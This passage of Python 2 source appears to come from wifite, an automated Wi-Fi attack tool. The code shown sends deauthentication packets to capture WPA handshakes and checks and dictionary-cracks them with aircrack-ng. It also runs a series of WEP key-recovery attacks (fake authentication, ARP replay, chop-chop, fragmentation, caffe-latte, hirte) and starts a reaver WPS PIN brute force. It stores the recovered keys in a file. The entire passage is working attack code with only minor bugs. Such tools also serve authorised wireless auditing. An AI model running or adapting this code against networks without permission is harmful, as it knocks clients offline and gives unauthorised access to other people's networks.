    print GR+" [+]"+W+" quitting" # wifite will now exit"
    # GTFO
    exit(code)


def attack_interrupted_prompt():
    """
        Promps user to decide if they want to exit, 
        skip to cracking WPA handshakes,
        or continue attacking the remaining targets (if applicable).
        returns True if user chose to exit complete, False otherwise
    """
    global TARGETS_REMAINING
    should_we_exit = False
    # If there are more targets to attack, ask what to do next
    if TARGETS_REMAINING > 0:
        options = ''
        print GR+"\n [+] %s%d%s target%s remain%s" % (G, TARGETS_REMAINING, W,
                                '' if TARGETS_REMAINING == 1 else 's', 
                                's' if TARGETS_REMAINING == 1 else '')
        print GR+" [+]"+W+" what do you want to do?"
        options += G+'c'+W
        print G+"     [c]ontinue"+W+" attacking targets"

        if len(WPA_CAPS_TO_CRACK) > 0:
            options += W+', '+O+'s'+W
            print O+"     [s]kip"+W+" to cracking WPA cap files"
        options += W+', or '+R+'e'+W
        print R+"     [e]xit"+W+" completely"
        ri = ''
        while ri != 'c' and ri != 's' and ri != 'e': 
            ri = raw_input(GR+' [+]'+W+' please make a selection (%s): ' % options)

        if ri == 's':
            TARGETS_REMAINING = -1 # Tells start() to ignore other targets, skip to cracking
        elif ri == 'e':
            should_we_exit = True
    return should_we_exit









#################
# WPA FUNCTIONS #
#################


def wpa_get_handshake(iface, target, clients):
    """
        Opens an airodump capture on the target, dumping to a file.
        During the capture, sends deauthentication packets to the target both as
        general deauthentication packets and specific packets aimed at connected clients.
        Waits until a handshake is captured.
            "iface"   - interface to capture on
            "target"  - Target object containing info on access point
            "clients" - List of Client objects associated with the target
        Returns True if handshake was found, False otherwise
    """
    global TARGETS_REMAINING, WPA_ATTACK_TIMEOUT

    if WPA_ATTACK_TIMEOUT <= 0: WPA_ATTACK_TIMEOUT = -1

    # Generate the filename to save the .cap file as <SSID>_aa-bb-cc-dd-ee-ff.cap
    save_as = WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \
              + '_' + target.bssid.replace(':', '-') + '.cap'

    # Check if we already have a handshake for this SSID... If we do, generate a new filename
    save_index = 0
    while os.path.exists(save_as):
        save_index += 1
        save_as = WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \
                         + '_' + target.bssid.replace(':', '-') \
                         + '_' + str(save_index) + '.cap'

    # Remove previous airodump output files (if needed)
    remove_airodump_files(temp + 'wpa')

    # Start of large Try-Except; used for catching keyboard interrupt (Ctrl+C)
    try:
        # Start airodump-ng process to capture handshakes
        cmd = ['airodump-ng', 
              '-w', temp + 'wpa', 
              '-c', target.channel, 
              '--bssid', target.bssid, iface]
        proc_read = Popen(cmd, stdout=DN, stderr=DN)

        # Setting deauthentication process here to avoid errors later on
        proc_deauth = None

        print ' %s starting %swpa handshake capture%s on "%s"' % \
                (GR+sec_to_hms(WPA_ATTACK_TIMEOUT)+W, G, W, G+target.ssid+W)
        got_handshake = False

        seconds_running = 0

        target_clients = clients[:]
        client_index = -1

        # Deauth and check-for-handshake loop
        while not got_handshake and (WPA_ATTACK_TIMEOUT <= 0 or seconds_running < WPA_ATTACK_TIMEOUT):

            time.sleep(1)
            seconds_running += 1

            print "                                                          \r",
            print ' %s listening for handshake...\r' % \
                  (GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W),
            stdout.flush()

            if seconds_running % WPA_DEAUTH_TIMEOUT == 0: 
                # Send deauth packets via aireplay-ng
                cmd = ['aireplay-ng', 
                      '-0',  # Attack method (Deauthentication)
                       '1',  # Number of packets to send
                      '-a', target.bssid]

                client_index += 1

                if client_index == -1 or len(target_clients) == 0 or client_index >= len(target_clients):
                    print " %s sending 1 deauth to %s*broadcast*%s..." % \
                             (GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W, G, W),
                    client_index = -1
                else:
                    print " %s sending 1 deauth to %s... " % \
                             (GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W, \
                             G+target_clients[client_index].bssid+W),
                    cmd.append('-h')
                    cmd.append(target_clients[client_index].bssid)
                cmd.append(iface)
                stdout.flush()

                # Send deauth packets via aireplay, wait for them to complete.
                proc_deauth = Popen(cmd, stdout=DN, stderr=DN)
                proc_deauth.wait()
                print "sent\r",
                stdout.flush()

            # Copy current dump file for consistency
            if not os.path.exists(temp + 'wpa-01.cap'): continue
            copy(temp + 'wpa-01.cap', temp + 'wpa-01.cap.temp')

            # Save copy of cap file (for debugging)
            #remove_file('/root/new/wpa-01.cap')
            #copy(temp + 'wpa-01.cap', '/root/new/wpa-01.cap')

            # Check for handshake
            if has_handshake(target, temp + 'wpa-01.cap.temp'):
                got_handshake = True

                try: os.mkdir(WPA_HANDSHAKE_DIR + os.sep)
                except OSError: pass

                # Kill the airodump and aireplay processes
                send_interrupt(proc_read)
                send_interrupt(proc_deauth)

                # Save a copy of the handshake
                rename(temp + 'wpa-01.cap.temp', save_as)

                print '\n %s %shandshake captured%s! saved as "%s"' % (GR+sec_to_hms(seconds_running)+W, G, W, G+save_as+W)
                WPA_FINDINGS.append('%s (%s) handshake captured' % (target.ssid, target.bssid))
                WPA_FINDINGS.append('saved as %s' % (save_as))
                WPA_FINDINGS.append('')

                # Strip handshake if needed
                if WPA_STRIP_HANDSHAKE: strip_handshake(save_as)

                # Add the filename and SSID to the list of 'to-crack'
                # Cracking will be handled after all attacks are finished.
                WPA_CAPS_TO_CRACK.append(CapFile(save_as, target.ssid, target.bssid))

                break # Break out of while loop

            # No handshake yet
            os.remove(temp + 'wpa-01.cap.temp')

            # Check the airodump output file for new clients
            for client in parse_csv(temp + 'wpa-01.csv')[1]:
                if client.station != target.bssid: continue
                new_client = True
                for c in target_clients:
                    if client.bssid == c.bssid: 
                        new_client = False
                        break

                if new_client:
                    print " %s %snew client%s found: %s                         " % \
                           (GR+sec_to_hms(WPA_ATTACK_TIMEOUT - seconds_running)+W, G, W, \
                           G+client.bssid+W)
                    target_clients.append(client)

        # End of Handshake wait loop.

        if not got_handshake:
            print R+' [0:00:00]'+O+' unable to capture handshake in time'+W

    except KeyboardInterrupt: 
        print R+'\n (^C)'+O+' WPA handshake capture interrupted'+W
        if attack_interrupted_prompt():
            remove_airodump_files(temp + 'wpa')
            send_interrupt(proc_read)
            send_interrupt(proc_deauth)
            print ''
            exit_gracefully(0)


    # clean up
    remove_airodump_files(temp + 'wpa')
    send_interrupt(proc_read)
    send_interrupt(proc_deauth)

    return got_handshake

def has_handshake_tshark(target, capfile):
    """
        Uses TShark to check for a handshake.
        Returns "True" if handshake is found, false otherwise.
    """
    if program_exists('tshark'):
        # Call Tshark to return list of EAPOL packets in cap file.
        cmd = ['tshark',
               '-r', capfile, # Input file
               '-R', 'eapol', # Filter (only EAPOL packets)
               '-n']          # Do not resolve names (MAC vendors)
        proc = Popen(cmd, stdout=PIPE, stderr=DN)
        proc.wait()
        lines = proc.communicate()[0].split('\n')

        # Get list of all clients in cap file
        clients = []
        for line in lines:
            if line.find('appears to have been cut short') != -1 or line.find('Running as user "root"') != -1 or line.strip() == '':
                continue

            while line.startswith(' '):  line = line[1:]
            while line.find('  ') != -1: line = line.replace('  ', ' ')

            fields = line.split(' ')
            src = fields[2].lower()
            dst = fields[4].lower()

            if src == target.bssid.lower() and clients.count(dst) == 0: clients.append(dst)
            elif dst == target.bssid.lower() and clients.count(src) == 0: clients.append(src)

        # Check each client for a handshake
        for client in clients:
            msg_num = 1 # Index of message in 4-way handshake (starts at 1)

            for line in lines:
                if line.find('appears to have been cut short') != -1: continue
                if line.find('Running as user "root"') != -1: continue
                if line.strip() == '': continue

                # Sanitize tshark's output, separate into fields
                while line[0] == ' ': line = line[1:]
                while line.find('  ') != -1: line = line.replace('  ', ' ')

                fields = line.split(' ')

                # Sometimes tshark doesn't display the full header for "Key (msg 3/4)" on the 3rd handshake.
                # This catches this glitch and fixes it.
                if len(fields) < 8: 
                    continue
                elif len(fields) == 8:
                    fields.append('(msg')
                    fields.append('3/4)')

                src = fields[2].lower() # Source MAC address
                dst = fields[4].lower() # Destination MAC address
                #msg = fields[9][0]      # The message number (1, 2, 3, or 4)
                msg = fields[-1][0]

                # First, third msgs in 4-way handshake are from the target to client
                if msg_num % 2 == 1 and (src != target.bssid.lower() or dst != client): continue
                # Second, fourth msgs in 4-way handshake are from client to target
                elif msg_num % 2 == 0 and (dst != target.bssid.lower() or src != client): continue

                # The messages must appear in sequential order.
                try:
                    if int(msg) != msg_num: continue
                except ValueError: continue

                msg_num += 1

                # We need the first 4 messages of the 4-way handshake
                # Although aircrack-ng cracks just fine with only 3 of the messages...
                if msg_num >= 4:
                    return True
    return False

def has_handshake_cowpatty(target, capfile, nonstrict=True):
    """
        Uses cowpatty to check for a handshake.
        Returns "True" if handshake is found, false otherwise.
    """
    if not program_exists('cowpatty'): return False

    # Call cowpatty to check if capfile contains a valid handshake.
    cmd = ['cowpatty',
           '-r', capfile,     # input file
           '-s', target.ssid, # SSID
           '-c']              # Check for handshake
    # Uses frames 1, 2, or 3 for key attack
    if nonstrict: cmd.append('-2')
    proc = Popen(cmd, stdout=PIPE, stderr=DN)
    proc.wait()
    response = proc.communicate()[0]
    if response.find('incomplete four-way handshake exchange') != -1:
        return False
    elif response.find('Unsupported or unrecognized pcap file.') != -1:
        return False
    elif response.find('Unable to open capture file: Success') != -1:
        return False
    return True

def has_handshake_pyrit(target, capfile):
    """
        Uses pyrit to check for a handshake.
        Returns "True" if handshake is found, false otherwise.
    """
    if not program_exists('pyrit'): return False

    # Call pyrit to "Analyze" the cap file's handshakes.
    cmd = ['pyrit',
           '-r', capfile,
           'analyze']
    proc = Popen(cmd, stdout=PIPE, stderr=DN)
    proc.wait()
    hit_essid = False
    for line in proc.communicate()[0].split('\n'):
        # Iterate over every line of output by Pyrit
        if line == '' or line == None: continue
        if line.find("AccessPoint") != -1:
            hit_essid = (line.find("('" + target.ssid + "')") != -1) and \
                        (line.lower().find(target.bssid.lower()) != -1)
            #hit_essid = (line.lower().find(target.bssid.lower()))

        else:
            # If Pyrit says it's good or workable, it's a valid handshake.
            if hit_essid and (line.find(', good, ') != -1 or \
                              line.find(', workable, ') != -1):
                                # or line.find(', bad, ') != -1):
                return True
    return False

def has_handshake_aircrack(target, capfile):
    """
        Uses aircrack-ng to check for handshake.
        Returns True if found, False otherwise.
    """
    if not program_exists('aircrack-ng'): return False
    crack = 'echo "" | aircrack-ng -a 2 -w - -b ' + target.bssid + ' ' + capfile
    proc_crack = Popen(crack, stdout=PIPE, stderr=DN, shell=True)
    proc_crack.wait()
    txt = proc_crack.communicate()[0]

    return (txt.find('Passphrase not in dictionary') != -1)

def has_handshake(target, capfile):
    """
        Checks if .cap file contains a handshake.
        Returns True if handshake is found, False otherwise.
    """
    valid_handshake = True
    tried = False
    if WPA_HANDSHAKE_TSHARK:
        tried = True
        valid_handshake = has_handshake_tshark(target, capfile)

    if valid_handshake and WPA_HANDSHAKE_COWPATTY:
        tried = True
        valid_handshake = has_handshake_cowpatty(target, capfile)

    # Use CowPatty to check for handshake.
    if valid_handshake and WPA_HANDSHAKE_COWPATTY:
        tried = True
        valid_handshake = has_handshake_cowpatty(target, capfile)

    # Check for handshake using Pyrit if applicable
    if valid_handshake and WPA_HANDSHAKE_PYRIT:
        tried = True
        valid_handshake = has_handshake_pyrit(target, capfile)

    # Check for handshake using aircrack-ng
    if valid_handshake and WPA_HANDSHAKE_AIRCRACK:
        tried = True
        valid_handshake = has_handshake_aircrack(target, capfile)

    if tried: return valid_handshake
    print R+' [!]'+O+' unable to check for handshake: all handshake options are disabled!'
    exit_gracefully(1)


def strip_handshake(capfile):
    """
        Uses Tshark or Pyrit to strip all non-handshake packets from a .cap file
        File in location 'capfile' is overwritten!
    """
    output_file = capfile
    if program_exists('pyrit'):
        cmd = ['pyrit',
             '-r', capfile,
             '-o', output_file,
             'strip']
        call(cmd,stdout=DN, stderr=DN)

    elif program_exists('tshark'):
        # strip results with tshark
        cmd = ['tshark',
               '-r', capfile,      # input file
               '-R', 'eapol || wlan_mgt.tag.interpretation', # filter
               '-w', capfile + '.temp'] # output file
        proc_strip = call(cmd, stdout=DN, stderr=DN)

        rename(capfile + '.temp', output_file)

    else:
        print R+" [!]"+O+" unable to strip .cap file: neither pyrit nor tshark were found"+W


def save_cracked(bssid, ssid, key, encryption):
    """
        Saves cracked access point key and info to a file.
    """
    sep = chr(0)
    fout = open('cracked.txt', 'a')
    fout.write(bssid + sep + ssid + sep + key + sep + encryption + '\n')
    fout.flush()
    fout.close()


def load_cracked():
    """
        Loads info about cracked access points into list, returns list.
    """
    result = []
    if not os.path.exists('cracked.txt'): return result
    fin = open('cracked.txt', 'r')
    lines = fin.read().split('\n')
    fin.close()

    for line in lines:
        fields = line.split(chr(0))
        if len(fields) <= 3: continue
        tar = Target(fields[0], '', '', '', fields[3], fields[1])
        tar.key = fields[2]
        result.append(tar)
    return result


##########################
# WPA CRACKING FUNCTIONS #
##########################

def wpa_crack(capfile):
    """
        Cracks cap file using aircrack-ng
        This is crude and slow. If people want to crack using pyrit or cowpatty or oclhashcat,
        they can do so manually.
    """
    if WPA_DICTIONARY == '':
        print R+' [!]'+O+' no WPA dictionary found! use -dict <file> command-line argument'+W
        return False

    print GR+' [0:00:00]'+W+' cracking %s with %s' % (G+capfile.ssid+W, G+'aircrack-ng'+W)
    start_time = time.time()
    cracked = False

    remove_file(temp + 'out.out')
    remove_file(temp + 'wpakey.txt')

    cmd = ['aircrack-ng',
           '-a', '2',                 # WPA crack
           '-w', WPA_DICTIONARY,      # Wordlist
           '-l', temp + 'wpakey.txt', # Save key to file
           '-b', capfile.bssid,       # BSSID of target
           capfile.filename]

    proc = Popen(cmd, stdout=open(temp + 'out.out', 'a'), stderr=DN)
    try:
        kt  = 0 # Keys tested
        kps = 0 # Keys per second
        while True: 
            time.sleep(1)

            if proc.poll() != None: # aircrack stopped
                if os.path.exists(temp + 'wpakey.txt'):
                    # Cracked
                    inf = open(temp + 'wpakey.txt')
                    key = inf.read().strip()
                    inf.close()
                    WPA_FINDINGS.append('cracked wpa key for "%s" (%s): "%s"' % (G+capfile.ssid+W, G+capfile.bssid+W, C+key+W))
                    WPA_FINDINGS.append('')

                    save_cracked(capfile.bssid, capfile.ssid, key, 'WPA')

                    print GR+'\n [+]'+W+' cracked %s (%s)!' % (G+capfile.ssid+W, G+capfile.bssid+W)
                    print GR+' [+]'+W+' key:    "%s"\n' % (C+key+W)
                    cracked = True
                else:
                    # Did not crack
                    print R+'\n [!]'+R+'crack attempt failed'+O+': passphrase not in dictionary'+W
                break

            inf = open(temp + 'out.out', 'r')
            lines = inf.read().split('\n')
            inf.close()
            outf = open(temp + 'out.out', 'w')
            outf.close()
            for line in lines:
                i = line.find(']')
                j = line.find('keys tested', i)
                if i != -1 and j != -1:
                    kts = line[i+2:j-1]
                    try: kt = int(kts)
                    except ValueError: pass
                i = line.find('(')
                j = line.find('k/s)', i)
                if i != -1 and j != -1:
                    kpss = line[i+1:j-1]
                    try: kps = float(kpss)
                    except ValueError: pass

            print "\r %s %s keys tested (%s%.2f keys/sec%s)   " % \
                   (GR+sec_to_hms(time.time() - start_time)+W, G+add_commas(kt)+W, G, kps, W),
            stdout.flush()

    except KeyboardInterrupt: print R+'\n (^C)'+O+' WPA cracking interrupted'+W

    send_interrupt(proc)
    try: os.kill(proc.pid, SIGTERM)
    except OSError: pass

    return cracked

def add_commas(n):
    """
        Receives integer n, returns string representation of n with commas in thousands place.
        I'm sure there's easier ways of doing this... but meh.
    """
    strn = str(n)
    lenn = len(strn)
    i = 0
    result = ''
    while i < lenn:
        if (lenn - i) % 3 == 0 and i != 0: result += ','
        result += strn[i]
        i += 1
    return result












#################
# WEP FUNCTIONS #
#################


def attack_wep(iface, target, clients):
    """
        Attacks WEP-encrypted network.
        Returns True if key was successfully found, False otherwise.
    """
    global WEP_TIMEOUT
    if WEP_TIMEOUT <= 0: WEP_TIMEOUT = -1

    total_attacks = 6 # 4 + (2 if len(clients) > 0 else 0)
    if not WEP_ARP_REPLAY: total_attacks -= 1
    if not WEP_CHOPCHOP:   total_attacks -= 1
    if not WEP_FRAGMENT:   total_attacks -= 1
    if not WEP_CAFFELATTE: total_attacks -= 1
    if not WEP_P0841:      total_attacks -= 1
    if not WEP_HIRTE:      total_attacks -= 1

    if total_attacks <= 0:
        print R+' [!]'+O+' unable to initiate WEP attacks: no attacks are selected!'
        return False

    print ' %s preparing attack "%s" (%s)' % \
               (GR+sec_to_hms(WEP_TIMEOUT)+W, \
               G+target.ssid+W, G+target.bssid+W)

    remove_airodump_files(temp + 'wep')
    remove_file(temp + 'wepkey.txt')

    # Start airodump process to capture packets
    cmd = ['airodump-ng',
           '-w', temp + 'wep',      # Output file name (wep-01.cap, wep-01.csv)
           '-c', target.channel,    # Wireless channel
           '--bssid', target.bssid,
           iface]
    proc_airodump = Popen(cmd, stdout=DN, stderr=DN)
    proc_aireplay = None

    successful       = False # Flag for when attack is successful
    started_cracking = False # Flag for when we have started aircrack-ng
    client_mac       = ''    # The client mac we will send packets to/from
    try:
        if wep_fake_auth(iface, target, sec_to_hms(WEP_TIMEOUT)):
            # Successful fake auth
            client_mac = THIS_MAC
        else:
            if not WEP_IGNORE_FAKEAUTH: 
                send_interrupt(proc_aireplay)
                send_interrupt(proc_airodump)
                print R+' [!]'+O+' unable to fake-authenticate with target'
                print R+' [!]'+O+' to skip this speed bump, select "ignore-fake-auth" at command-line'
                return False


        ivs = 0
        last_ivs = 0
        for attack_num in xrange(0, 6):

            # Skip disabled attacks
            if   attack_num == 0 and not WEP_ARP_REPLAY: continue
            elif attack_num == 1 and not WEP_CHOPCHOP:   continue
            elif attack_num == 2 and not WEP_FRAGMENT:   continue
            elif attack_num == 3 and not WEP_CAFFELATTE: continue
            elif attack_num == 4 and not WEP_P0841:      continue
            elif attack_num == 5 and not WEP_HIRTE:      continue

            remove_file(temp + 'arp.cap')
            # Generate the aireplay-ng arguments based on attack_num and other params
            cmd = get_aireplay_command(iface, attack_num, target, clients, client_mac)
            if cmd == '': continue
            proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)

            print '\r %s attacking "%s" via' % (GR+sec_to_hms(WEP_TIMEOUT)+W, G+target.ssid+W),
            if attack_num == 0:   print G+'arp-replay',
            elif attack_num == 1: print G+'chop-chop',
            elif attack_num == 2: print G+'fragmentation',
            elif attack_num == 3: print G+'caffe-latte',
            elif attack_num == 4: print G+'p0841',
            elif attack_num == 5: print G+'hirte',
            print 'attack'+W

            print ' %s captured %s ivs @ %s iv/sec' % (GR+sec_to_hms(WEP_TIMEOUT)+W, G+'0'+W, G+'0'+W),
            stdout.flush()

            time.sleep(1)
            if attack_num == 1:
                # Send a deauth packet to broadcast and all clients *just because!*
                wep_send_deauths(iface, target, clients)
            last_deauth = time.time()

            replaying = False
            time_started = time.time()
            while time.time() - time_started < WEP_TIMEOUT:
                # time.sleep(5)
                for time_count in xrange(0, 6):
                    if WEP_TIMEOUT == -1:
                        current_hms = "[endless]"
                    else: 
                        current_hms = sec_to_hms(WEP_TIMEOUT - (time.time() - time_started))
                    print "\r %s\r" % (GR+current_hms+W),
                    stdout.flush()
                    time.sleep(1)

                # Calculates total seconds remaining

                # Check number of IVs captured
                csv = parse_csv(temp + 'wep-01.csv')[0]
                if len(csv) > 0:
                    ivs = int(csv[0].data)
                    print "\r                                                   ",
                    print "\r %s captured %s%d%s ivs @ %s%d%s iv/sec" % \
                              (GR+current_hms+W, G, ivs, W, G, (ivs - last_ivs) / 5, W),

                    if ivs - last_ivs == 0 and time.time() - last_deauth > 30:
                        print "\r %s deauthing to generate packets..." % (GR+current_hms+W),
                        wep_send_deauths(iface, target, clients)
                        print "done",
                        last_deauth = time.time()

                    last_ivs = ivs
                    stdout.flush()
                    if ivs >= WEP_CRACK_AT_IVS and not started_cracking:
                        # Start cracking
                        cmd = ['aircrack-ng',
                               '-a', '1',
                               '-l', temp + 'wepkey.txt',
                               temp + 'wep-01.cap']
                        print "\r %s started %s (%sover %d ivs%s)" % (GR+current_hms+W, G+'cracking'+W, G, WEP_CRACK_AT_IVS, W)
                        proc_aircrack = Popen(cmd, stdout=DN, stderr=DN)
                        started_cracking = True

                # Check if key has been cracked yet.
                if os.path.exists(temp + 'wepkey.txt'):
                    # Cracked!
                    infile = open(temp + 'wepkey.txt', 'r')
                    key = infile.read().replace('\n', '')
                    infile.close()
                    print '\n\n %s %s %s (%s)! key: "%s"' % (current_hms, G+'cracked', target.ssid+W, G+target.bssid+W, C+key+W)
                    WEP_FINDINGS.append('cracked %s (%s), key: "%s"' % (target.ssid, target.bssid, key))
                    WEP_FINDINGS.append('')

                    save_cracked(target.bssid, target.ssid, key, 'WEP')

                    # Kill processes
                    send_interrupt(proc_airodump)
                    send_interrupt(proc_aireplay)
                    try: os.kill(proc_aireplay, SIGTERM)
                    except: pass
                    send_interrupt(proc_aircrack)
                    # Remove files generated by airodump/aireplay/packetforce
                    time.sleep(0.5)
                    remove_airodump_files(temp + 'wep')
                    remove_file(temp + 'wepkey.txt')
                    return True

                # Check if aireplay is still executing
                if proc_aireplay.poll() == None: 
                    if replaying: print ', '+G+'replaying         \r'+W,
                    elif attack_num == 1 or attack_num == 2: print ', waiting for packet    \r',
                    stdout.flush()
                    continue

                # At this point, aireplay has stopped
                if attack_num != 1 and attack_num != 2:
                    print '\r %s attack failed: %saireplay-ng exited unexpectedly%s' % (R+current_hms, O, W)
                    break # Break out of attack's While loop

                # Check for a .XOR file (we expect one when doing chopchop/fragmentation
                xor_file = ''
                for filename in os.listdir(temp):
                    if filename.lower().endswith('.xor'): xor_file = temp + filename
                if xor_file == '':
                    print '\r %s attack failed: %sunable to generate keystream        %s' % (R+current_hms, O, W)
                    break

                remove_file(temp + 'arp.cap')
                cmd = ['packetforge-ng',
                         '-0',
                         '-a', targets.bssid,
                         '-h', client_mac,
                         '-k', '192.168.1.2',
                         '-l', '192.168.1.100',
                         '-y', xor_file,
                         '-w', temp + 'arp.cap',
                         iface]
                proc_pforge = Popen(cmd, stdout=PIPE, stderr=DN)
                proc_pforge.wait()
                forged_packet = proc_pforge.communicate()[0]
                remove_file(xor_file)
                if forged_packet == None: result = ''
                forged_packet = forged_packet.strip()
                if not forged_packet.find('Wrote packet'):
                    print "\r %s attack failed: unable to forget ARP packet               %s" % (R+current_hms+O, w)
                    break

                # We were able to forge a packet, so let's replay it via aireplay-ng
                cmd = ['aireplay-ng',
                       '--arpreplay',
                       '-b', target.bssid,
                       '-r', temp + 'arp.cap', # Used the forged ARP packet
                       '-F', # Select the first packet
                       iface]
                proc_aireplay = Popen(cmd, stdout=DN, stderr=DN)

                print '\r %s forged %s! %s...         ' % (GR+current_hms+W, G+'arp packet'+W, G+'replaying'+W)
                replaying = True


        # After the attacks, if we are already cracking, wait for the key to be found!
        while ivs > WEP_CRACK_AT_IVS:
            time.sleep(5)
            # Check number of IVs captured
            csv = parse_csv(temp + 'wep-01.csv')[0]
            if len(csv) > 0:
                ivs = int(csv[0].data)
                print GR+" [endless]"+W+" captured %s%d%s ivs, iv/sec: %s%d%s  \r" % (G, ivs, W, G, (ivs - last_ivs) / 5, W),
                last_ivs = ivs
                stdout.flush()

            # Check if key has been cracked yet.
            if os.path.exists(temp + 'wepkey.txt'):
                # Cracked!
                infile = open(temp + 'wepkey.txt', 'r')
                key = infile.read().replace('\n', '')
                infile.close()
                print GR+'\n\n [endless] %s %s (%s)! key: "%s"' % (G+'cracked', target.ssid+W, G+target.bssid+W, C+key+W)
                WEP_FINDINGS.append('cracked %s (%s), key: "%s"' % (target.ssid, target.bssid, key))
                WEP_FINDINGS.append('')

                save_cracked(target.bssid, target.ssid, key, 'WEP')

                # Kill processes
                send_interrupt(proc_airodump)
                send_interrupt(proc_aireplay)
                send_interrupt(proc_aircrack)
                # Remove files generated by airodump/aireplay/packetforce
                remove_airodump_files(temp + 'wep')
                remove_file(temp + 'wepkey.txt')
                return True

    except KeyboardInterrupt:
        print R+'\n (^C)'+O+' WEP attack interrupted'+W

        if WEP_SAVE:
            # Save packets
            save_as = re.sub(r'[^a-zA-Z0-9]', '', target.ssid) + '_' + target.bssid.replace(':', '-') + '.cap'+W
            try:            rename(temp + 'wep-01.cap', save_as)
            except OSError: print R+' [!]'+O+' unable to save capture file!'+W
            else:           print GR+' [+]'+W+' packet capture '+G+'saved'+W+' to '+G+save_as+W

        if attack_interrupted_prompt():
            send_interrupt(proc_airodump)
            if proc_aireplay != None:
                send_interrupt(proc_aireplay)

            # Remove files generated by airodump/aireplay/packetforce
            for filename in os.listdir('.'):
                if filename.startswith('replay_arp-') and filename.endswith('.cap'):
                    remove_file(filename)
            remove_airodump_files(temp + 'wep')
            remove_file(temp + 'wepkey.txt')
            print ''
            exit_gracefully(0)



    if successful:
        print GR+'\n [0:00:00]'+W+' attack complete: '+G+'success!'+W
    else:
        print GR+'\n [0:00:00]'+W+' attack complete: '+R+'failure'+W

    send_interrupt(proc_airodump)
    if proc_aireplay != None:
        send_interrupt(proc_aireplay)

    # Remove files generated by airodump/aireplay/packetforce
    for filename in os.listdir('.'):
        if filename.startswith('replay_arp-') and filename.endswith('.cap'):
            remove_file(filename)
    remove_airodump_files(temp + 'wep')
    remove_file(temp + 'wepkey.txt')


def wep_fake_auth(iface, target, time_to_display):
    """
        Attempt to (falsely) authenticate with a WEP access point.
        Gives 3 seconds to make each 5 authentication attempts.
        Returns True if authentication was successful, False otherwise.
    """
    max_wait = 3 # Time, in seconds, to allow each fake authentication
    max_attempts = 5 # Number of attempts to make

    for fa_index in xrange(1, max_attempts + 1):
        print '\r                                                            ',
        print '\r %s attempting %sfake authentication%s (%d/%d)... ' % \
               (GR+time_to_display+W, G, W, fa_index, max_attempts),
        stdout.flush()

        cmd = ['aireplay-ng',
               '-1', '0', # Fake auth, no delay
               '-a', target.bssid,
               '-T', '1'] # Make 1 attempt
        if target.ssid != '':
            cmd.append('-e')
            cmd.append(target.ssid)
        cmd.append(iface)

        proc_fakeauth = Popen(cmd, stdout=PIPE, stderr=DN)
        started = time.time()
        while proc_fakeauth.poll() == None and time.time() - started <= max_wait: pass
        if time.time() - started > max_wait:
            send_interrupt(proc_fakeauth)
            print R+'failed'+W,
            stdout.flush()
            time.sleep(0.5)
            continue

        result = proc_fakeauth.communicate()[0].lower()
        if result.find('switching to shared key') != -1 or \
             result.find('rejects open system'): pass
             # TODO Shared Key Authentication (SKA)
        if result.find('association successful') != -1:
            print G+'success!'+W
            return True

        print R+'failed'+W,
        stdout.flush()
        time.sleep(0.5)
        continue
    print ''
    return False


def get_aireplay_command(iface, attack_num, target, clients, client_mac):
    """
        Returns aireplay-ng command line arguments based on parameters.
    """
    cmd = ''
    if attack_num == 0:
        cmd = ['aireplay-ng',
               '--arpreplay',
               '-b', target.bssid,
               '-x', str(WEP_PPS)] # Packets per second
        if client_mac != '': 
            cmd.append('-h')
            cmd.append(client_mac)
        elif len(clients) > 0: 
            cmd.append('-h')
            cmd.append(clients[0].bssid)
        cmd.append(iface)

    elif attack_num == 1:
        cmd = ['aireplay-ng',
               '--chopchop',
               '-b', target.bssid,
               '-x', str(WEP_PPS), # Packets per second
               '-m', '60', # Minimum packet length (bytes)
               '-n', '82', # Maxmimum packet length
               '-F'] # Automatically choose the first packet
        if client_mac != '': 
            cmd.append('-h')
            cmd.append(client_mac)
        elif len(clients) > 0: 
            cmd.append('-h')
            cmd.append(clients[0].bssid)
        cmd.append(iface)

    elif attack_num == 2:
        cmd = ['aireplay-ng',
               '--fragment',
               '-b', target.bssid,
               '-x', str(WEP_PPS), # Packets per second
               '-m', '100', # Minimum packet length (bytes)
               '-F'] # Automatically choose the first packet
        if client_mac != '': 
            cmd.append('-h')
            cmd.append(client_mac)
        elif len(clients) > 0: 
            cmd.append('-h')
            cmd.append(clients[0].bssid)
        cmd.append(iface)

    elif attack_num == 3:
        cmd = ['aireplay-ng',
               '--caffe-latte',
               '-b', target.bssid]
        if len(clients) > 0:
            cmd.append('-h')
            cmd.append(clients[0].bssid)
        cmd.append(iface)

    elif attack_num == 4:
        cmd = ['aireplay-ng',
               '--interactive',
               '-b', target.bssid,
               '-c', 'ff:ff:ff:ff:ff:ff',
               '-t', '1', # Only select packets with ToDS bit set
               '-x', str(WEP_PPS), # Packets per second
               '-F',      # Automatically choose the first packet
               '-p', '0841']
        cmd.append(iface)

    elif attack_num == 5:
        if len(clients) == 0:
            print R+' [0:00:00] unable to carry out hirte attack: '+O+'no clients'
            return ''
        cmd = ['aireplay-ng',
               '--cfrag',
               '-h', clients[0].bssid,
               iface]

    return cmd


def wep_send_deauths(iface, target, clients):
    """
        Sends deauth packets to broadcast and every client.
    """
    # Send deauth to broadcast
    cmd = ['aireplay-ng',
           '--deauth', '1',
           '-a', target.bssid,
           iface]
    call(cmd, stdout=DN, stderr=DN)
    # Send deauth to every client
    for client in clients:
        cmd = ['aireplay-ng',
                 '--deauth', '1',
                 '-a', target.bssid,
                 '-h', client.bssid,
                 iface]
        call(cmd, stdout=DN, stderr=DN)










#################
# WPS FUNCTIONS #
#################


def wps_attack(iface, target):
    """
        Mounts attack against target on iface.
        Uses "reaver" to attempt to brute force the PIN.
        Once PIN is found, PSK can be recovered.
        PSK is displayed to user and added to WPS_FINDINGS
    """

    print GR+' [0:00:00]'+W+' initializing %sWPS PIN attack%s on %s' % \
                 (G, W, G+target.ssid+W+' ('+G+target.bssid+W+')'+W)

    cmd = ['reaver',
           '-i', iface,
           '-b', target.bssid,
           '-o', temp + 'out.out', # Dump output to file to be monitored
           '-a',  # auto-detect best options, auto-resumes sessions, doesn't require input!
           '-c', target.channel,
           # '--ignore-locks',
           '-vv']  # verbose output
    proc = Popen(cmd, stdout=DN, stderr=DN)

